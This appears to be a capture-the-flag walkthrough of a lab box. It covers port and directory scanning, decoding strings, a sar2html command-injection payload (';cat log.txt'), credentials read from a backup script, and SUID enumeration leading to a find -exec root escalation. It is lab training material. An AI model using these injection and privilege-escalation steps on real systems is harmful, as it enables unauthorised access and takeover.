Let's decrypt the value written in the ftp file with rot13.
nothing
We were asked the service on port 10000 could be exploited. Let's try.
The answer is "nay".
lets get back to dirb browsing. Scan the files in the web service
robots.txt
We see the "ascii" code at the bottom
Let's decrypt in the order "ASCII →Base64 →MD5".
And the string we got is: kidding.
There is nothing in the other files in the robots.txt content.
next question asked about the CMS service that works for us.
go back to the files in the dirb result. The answer is Joomla.
Let's scan the files in Joomla.
When we go to the files one by one, we see that /_test is the only page that can be useful to us.
When doing a short search on Google for sar2html, we can see that there is an exploit.
We were told how to use it.
The output of the command we entered into the URL appears below.
;cat log.txt
ssh informations
When we try the port in the log.txt file, we see that it is closed.
We did not see ssh in the Nmap scan. We need to scan again. “-p-“
55007
let's login
When we look at the files, we see the backup.sh file.
When we read it with the "cat" command, the USER=stoner line draws our attention. and the password is on the bottom line.
When we switch to the Stoner user, we can obtain user.txt.
when we run "sudo -l" we get "/NotThisTime/MessinWithYa"....
Now time to use find to search for the the files whose SUID bits is set.
SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it.
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
In the list there is find commnad which have SUID bit set which means we can run find as root user. Using -exec flag as shown above. Let’s try out by changing the permission of root directory.
